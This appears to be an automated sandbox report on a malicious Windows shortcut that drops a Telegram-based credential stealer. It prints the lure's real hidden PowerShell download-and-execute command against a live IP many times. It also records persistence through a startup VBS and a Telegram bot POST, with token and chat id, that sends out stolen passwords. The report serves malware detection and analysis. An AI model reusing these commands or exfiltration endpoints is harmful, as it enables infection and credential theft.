Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ORDER-202577008.lnk

Overview

General Information

Sample name:ORDER-202577008.lnk
Analysis ID:1592505
MD5:f5d22b3d80cde02b17d97b4c8558eb72
SHA1:64ee3a115979a3b3e2cb82cafa7fd987c2533e29
SHA256:6ac9c6530a44086277078565059ebee1e473173cdc6dea11616eb51ac02ef0dc
Tags:lnkuser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Windows shortcut file (LNK) starts blacklisted processes
Yara detected AntiVM3
Yara detected Telegram RAT
AI detected suspicious sample
Drops VBS files to the startup folder
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Powershell drops PE file
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Windows shortcut file (LNK) contains suspicious command line arguments
Yara detected Costura Assembly Loader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 6392 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri http://87.120.113.91/chrome.exe -OutFile C:\Users\user\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\user\AppData\Local\Temp\file.exe' }" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 5788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • file.exe (PID: 3136 cmdline: "C:\Users\user\AppData\Local\Temp\file.exe" MD5: 83E93539D82C1A0DB8E7564F2665911C)
      • file.exe (PID: 2072 cmdline: "C:\Users\user\AppData\Local\Temp\file.exe" MD5: 83E93539D82C1A0DB8E7564F2665911C)
  • wscript.exe (PID: 6804 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TypeId.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • TypeId.exe (PID: 1088 cmdline: "C:\Users\user\AppData\Roaming\TypeId.exe" MD5: 83E93539D82C1A0DB8E7564F2665911C)
      • TypeId.exe (PID: 5712 cmdline: "C:\Users\user\AppData\Roaming\TypeId.exe" MD5: 83E93539D82C1A0DB8E7564F2665911C)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.2281972613.000000000297C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
    00000008.00000002.2547706995.000000000241C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
      00000003.00000002.2314157262.0000000006860000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
        00000006.00000002.4559068186.0000000002529000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000006.00000002.4559068186.0000000002529000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
            Click to see the 12 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            3.2.file.exe.6860000.8.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
              3.2.file.exe.6860000.8.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Suspicious Invoke-WebRequest Execution
                Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri http://87.120.113.91/chrome.exe -OutFile C:\Users\user\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\user\AppData\Local\Temp\file.exe' }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri http://87.120.113.91/chrome.exe -OutFile C:\Users\user\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\user\AppData\Local\Temp\file.exe' }", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri http://87.120.113.91/chrome.exe -OutFile C:\Users\user\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\user\AppData\Local\Temp\file.exe' }", ProcessId: 6392, ProcessName: powershell.exe
                Sigma detected: Suspicious Script Execution From Temp Folder
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri http://87.120.113.91/chrome.exe -OutFile C:\Users\user\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\user\AppData\Local\Temp\file.exe' }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri http://87.120.113.91/chrome.exe -OutFile C:\Users\user\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\user\AppData\Local\Temp\file.exe' }", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri http://87.120.113.91/chrome.exe -OutFile C:\Users\user\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\user\AppData\Local\Temp\file.exe' }", ProcessId: 6392, ProcessName: powershell.exe
                Sigma detected: WScript or CScript Dropper
                Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TypeId.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TypeId.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TypeId.vbs" , ProcessId: 6804, ProcessName: wscript.exe
                Sigma detected: PowerShell Web Download
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri http://87.120.113.91/chrome.exe -OutFile C:\Users\user\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\user\AppData\Local\Temp\file.exe' }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri http://87.120.113.91/chrome.exe -OutFile C:\Users\user\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\user\AppData\Local\Temp\file.exe' }", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri http://87.120.113.91/chrome.exe -OutFile C:\Users\user\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\user\AppData\Local\Temp\file.exe' }", ProcessId: 6392, ProcessName: powershell.exe
                Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
                Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri http://87.120.113.91/chrome.exe -OutFile C:\Users\user\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\user\AppData\Local\Temp\file.exe' }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri http://87.120.113.91/chrome.exe -OutFile C:\Users\user\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\user\AppData\Local\Temp\file.exe' }", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri http://87.120.113.91/chrome.exe -OutFile C:\Users\user\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\user\AppData\Local\Temp\file.exe' }", ProcessId: 6392, ProcessName: powershell.exe
                Sigma detected: Usage Of Web Request Commands And Cmdlets
                Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri http://87.120.113.91/chrome.exe -OutFile C:\Users\user\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\user\AppData\Local\Temp\file.exe' }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri http://87.120.113.91/chrome.exe -OutFile C:\Users\user\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\user\AppData\Local\Temp\file.exe' }", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri http://87.120.113.91/chrome.exe -OutFile C:\Users\user\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\user\AppData\Local\Temp\file.exe' }", ProcessId: 6392, ProcessName: powershell.exe
                Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TypeId.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TypeId.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TypeId.vbs" , ProcessId: 6804, ProcessName: wscript.exe
                Sigma detected: Non Interactive PowerShell Process Spawned
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri http://87.120.113.91/chrome.exe -OutFile C:\Users\user\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\user\AppData\Local\Temp\file.exe' }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri http://87.120.113.91/chrome.exe -OutFile C:\Users\user\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\user\AppData\Local\Temp\file.exe' }", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri http://87.120.113.91/chrome.exe -OutFile C:\Users\user\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\user\AppData\Local\Temp\file.exe' }", ProcessId: 6392, ProcessName: powershell.exe

                Data Obfuscation

                barindex
                Sigma detected: Drops script at startup location
                Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\file.exe, ProcessId: 3136, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TypeId.vbs

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-16T08:31:04.158058+010020577441Malware Command and Control Activity Detected192.168.2.549799149.154.167.220443TCP
                2025-01-16T08:31:30.638623+010020577441Malware Command and Control Activity Detected192.168.2.549976149.154.167.220443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-16T08:30:56.842613+010028032742Potentially Bad Traffic192.168.2.549752193.122.6.16880TCP
                2025-01-16T08:31:02.967639+010028032742Potentially Bad Traffic192.168.2.549752193.122.6.16880TCP
                2025-01-16T08:31:23.358299+010028032742Potentially Bad Traffic192.168.2.549926132.226.247.7380TCP
                2025-01-16T08:31:29.483329+010028032742Potentially Bad Traffic192.168.2.549926132.226.247.7380TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-16T08:31:03.599610+010018100081Potentially Bad Traffic192.168.2.549799149.154.167.220443TCP
                2025-01-16T08:31:30.199698+010018100081Potentially Bad Traffic192.168.2.549976149.154.167.220443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-16T08:30:39.842499+010018100032Potentially Bad Traffic87.120.113.9180192.168.2.549705TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-16T08:30:39.842447+010018100002Potentially Bad Traffic192.168.2.54970587.120.113.9180TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Multi AV Scanner detection for submitted file
                Source: ORDER-202577008.lnkReversingLabs: Detection: 26%
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for dropped file
                Source: C:\Users\user\AppData\Local\Temp\file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Roaming\TypeId.exeJoe Sandbox ML: detected
                Machine Learning detection for sample
                Source: ORDER-202577008.lnkJoe Sandbox ML: detected

                Location Tracking

                barindex
                Tries to detect the country of the analysis system (by using the IP)
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:49758 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:49936 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 166.62.28.147:443 -> 192.168.2.5:49706 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49799 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 166.62.28.147:443 -> 192.168.2.5:49831 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49976 version: TLS 1.2
                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: file.exe, 00000003.00000002.2301533818.0000000003931000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000002.2306539593.00000000059E0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000003.00000002.2301533818.0000000003A5A000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: file.exe, 00000003.00000002.2301533818.0000000003931000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000002.2306539593.00000000059E0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000003.00000002.2301533818.0000000003A5A000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: protobuf-net.pdbSHA256}Lq source: file.exe, 00000003.00000002.2301533818.0000000003989000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000002.2315784967.0000000006AC0000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: protobuf-net.pdb source: file.exe, 00000003.00000002.2301533818.0000000003989000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000002.2315784967.0000000006AC0000.00000004.08000000.00040000.00000000.sdmp
                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Jump to behavior
                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Jump to behavior
                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeCode function: 4x nop then jmp 05E96800h6_2_05E9641B

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49799 -> 149.154.167.220:443
                Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:49799 -> 149.154.167.220:443
                Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49976 -> 149.154.167.220:443
                Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:49976 -> 149.154.167.220:443
                Uses the Telegram API (likely for C&C communication)
                Source: unknownDNS query: name: api.telegram.org
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/octet-streamLast-Modified: Tue, 03 Sep 2024 20:32:05 GMTAccept-Ranges: bytesETag: "f082e65640feda1:0"Server: Microsoft-IIS/10.0Date: Thu, 16 Jan 2025 07:30:39 GMTContent-Length: 188928Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 2f 29 88 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 d8 02 00 00 08 00 00 00 00 00 00 3e f6 02 00 00 20 00 00 00 00 03 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 03 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 ec f5 02 00 4f 00 00 00 00 00 03 00 b6 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 03 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 44 d6 02 00 00 20 00 00 00 d8 02 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 b6 05 00 00 00 00 03 00 00 06 00 00 00 da 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 03 00 00 02 00 00 00 e0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 f6 02 00 00 00 00 00 48 00 00 00 02 00 05 00 58 66 01 00 94 8f 01 00 03 00 00 00 01 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 28 02 00 00 06 2a 1e 02 28 54 00 00 0a 2a 1e 02 7b 03 00 00 04 2a 1e 02 7b 04 00 00 04 2a 22 02 03 7d 04 00 00 04 2a 1e 02 7b 05 00 00 04 2a 22 02 03 7d 05 00 00 04 2a 1e 02 7b 06 00 00 04 2a 22 02 03 7d 06 00 00 04 2a 46 04 05 03 73 05 00 00 06 25 02 03 6f 18 00 00 06 2a 86 02 03 17 28 16 00 00 06 26 03 6f 2b 00 00 06 6f 5c 00 00 0a 03 6f 2b 00 00 06 16 6f 5d 00 00 0a 2a 92 02 28 17 00 00 06 73 5e 00 00 0a 25 03 73 8b 00 00 06 02 28 07 00 00 06 6f 8e 00 00 06 26 6f 5c 00 00 0a 2a b2 02 28 09 00 00 06 39 20 00 00 00 72 d8 01 00 70 72 cb 02 00 70 02 28 0b 00 00 06 28 1c 04 00 06 28 5f 00 00 0a 73 60 00 00 0a 7a 2a 36 02 7b 16 00 00 04 17 fe 02 16 fe 01 2a 22 02 14 28 1b 00 00 06 2a 8a 02 7c 0a 00 00 04 28 74 00 00 0a 39 0c 00 00 00 02 7c 0a 00 00 04 28 75 00 00 0a 2a 28 76 00 00 0a 2a 1e 02 7b 1d 00 00 04 2a 22 02 03 7d 1d 00 00 04 2a 1e 02 7b 1e 00 00 04 2a 22 02 03 7d 1e 00 00 04 2a 1e 02 7b 1f 00 00 04 2a 22 02 03 7d 1f 00 00 04 2a 1e 02 7b 20 00 00 04 2
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /bot7666772215:AAG3oWDDhgYedd4yOneZp0AStrhY_tgTlTc/sendDocument?chat_id=5830304904&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd35d5d1e97e85Host: api.telegram.orgContent-Length: 1088Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /bot7666772215:AAG3oWDDhgYedd4yOneZp0AStrhY_tgTlTc/sendDocument?chat_id=5830304904&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd35d5e1b5622dHost: api.telegram.orgContent-Length: 1088Connection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                Source: Joe Sandbox ViewIP Address: 193.122.6.168 193.122.6.168
                Source: Joe Sandbox ViewASN Name: UNACS-AS-BG8000BurgasBG UNACS-AS-BG8000BurgasBG
                Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: unknownDNS query: name: checkip.dyndns.org
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: unknownDNS query: name: checkip.dyndns.org
                Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:49705 -> 87.120.113.91:80
                Source: Network trafficSuricata IDS: 1810003 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP PE File Download : 87.120.113.91:80 -> 192.168.2.5:49705
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49752 -> 193.122.6.168:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49926 -> 132.226.247.73:80
                Source: global trafficHTTP traffic detected: GET /panel/uploads/Cicycmiv.mp3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: az-ka.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /panel/uploads/Cicycmiv.mp3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: az-ka.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /chrome.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 87.120.113.91Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
